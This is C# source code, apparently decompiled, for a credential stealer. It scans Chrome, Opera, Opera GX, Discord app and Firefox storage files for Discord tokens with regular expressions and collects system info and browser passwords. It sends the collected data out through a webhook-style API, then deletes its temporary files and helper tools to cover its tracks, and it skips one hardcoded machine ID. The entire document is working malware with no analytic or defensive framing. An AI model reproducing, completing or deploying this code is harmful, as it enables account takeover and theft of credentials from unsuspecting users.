public static void StartSteal()
{
using (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64))
{
using (RegistryKey registryKey2 = registryKey.OpenSubKey("SOFTWARE\\Microsoft\\Cryptography"))
{
if (!(Convert.ToString(registryKey2.GetValue("MachineGuid")) == "90059c37-1320-41a4-b58d-2b75a9850d2f"))
{
try
{
Stealer.StealTokenFromChrome();
Stealer.StealTokenFromOpera();
Stealer.StealTokenFromOperaGX();
Stealer.StealTokenFromDiscordApp();
Stealer.StealTokenFromFirefox();
Stealer.Send(File.ReadAllText(Stealer._path));
if (File.Exists(Stealer._path))
{
File.Delete(Stealer._path);
}
}
catch (Exception)
{
}
}
}
}
}
private static string SaveTokens(string token)
{
if (!(token == ""))
{
string text = "";
if (Stealer.Chrome)
{
text = "```Chrome";
}
else if (Stealer.Opera)
{
text = "```Opera";
}
else if (Stealer.App)
{
text = "```Discord App";
}
else if (Stealer.OperaGX)
{
text = "```Opera GX";
}
else
{
text = "```Unknown";
}
text = text + " Token :: " + token + "```";
File.AppendAllText(Stealer._path, text);
Stealer.RemoveDuplicatedLines(Stealer._path);
}
return(token);
}
private static void Main(string[] args)
{
new API(API.Hook)
{
_name = API.name,
_ppUrl = API.pfp
}.SendSysInfo("**SYSTEM INFO**", "C:/temp/System_INFO.txt");
File.Delete("C:/temp/System_INFO.txt");
File.Delete("C:/temp/finalres.vbs");
File.Delete("C:/temp/WebBrowserPassView.exe");
API.Passwords();
Stealer.StartSteal();
Environment.Exit(0);
}
private static void StealTokenFromOperaGX()
{
string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\";
DirectoryInfo folder = new DirectoryInfo(path);
if (Directory.Exists(path))
{
Stealer.OperaGX = true;
List <string> list = Stealer.TokenStealer(folder, false);
if (list != null && list.Count > 0)
{
Stealer.OperaGX = true;
}
}
}
private static void StealTokenFromChrome()
{
string path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\";
DirectoryInfo folder = new DirectoryInfo(path);
if (Directory.Exists(path))
{
Stealer.Chrome = true;
List <string> list = Stealer.TokenStealer(folder, false);
if (list != null && list.Count > 0)
{
Stealer.Chrome = true;
}
}
}
private static void StealTokenFromFirefox()
{
string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles\\";
if (Directory.Exists(path))
{
foreach (string text in Directory.EnumerateFiles(path, "webappsstore.sqlite", SearchOption.AllDirectories))
{
List <string> list = Stealer.TokenStealerForFirefox(new DirectoryInfo(text.Replace("webappsstore.sqlite", "")), false);
if (list != null && list.Count > 0)
{
foreach (string str in (from t in list
where !Stealer.App
select t).Select(new Func <string, string>(Stealer.TokenCheckAcces)))
{
Stealer.Firefox = true;
File.AppendAllText(Stealer._path, "Firefox Token: " + str + Environment.NewLine);
}
}
}
}
}
private static List <string> TokenStealer(DirectoryInfo Folder, bool checkLogs = false)
{
List <string> list = new List <string>();
try
{
FileInfo[] files = Folder.GetFiles(checkLogs ? "*.log" : "*.ldb");
for (int i = 0; i < files.Length; i++)
{
string input = files[i].OpenText().ReadToEnd();
foreach (object obj in Regex.Matches(input, @"[a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}"))
{
Stealer.SaveTokens(Stealer.TokenCheckAcces(((Match)obj).Value));
}
foreach (object obj2 in Regex.Matches(input, @"mfa\.[a-zA-Z0-9_\-]{84}"))
{
Stealer.SaveTokens(Stealer.TokenCheckAcces(((Match)obj2).Value));
}
}
}
catch
{
}
list = list.Distinct <string>().ToList <string>();
if (list.Count > 0)
{
Stealer.StealFound = true;
List <string> list2 = list;
int index = list.Count - 1;
list2[index] = (list2[index] ?? "");
}
Stealer.Firefox = false;
Stealer.Opera = false;
Stealer.Chrome = false;
Stealer.App = false;
Stealer.OperaGX = false;
return(list);
}
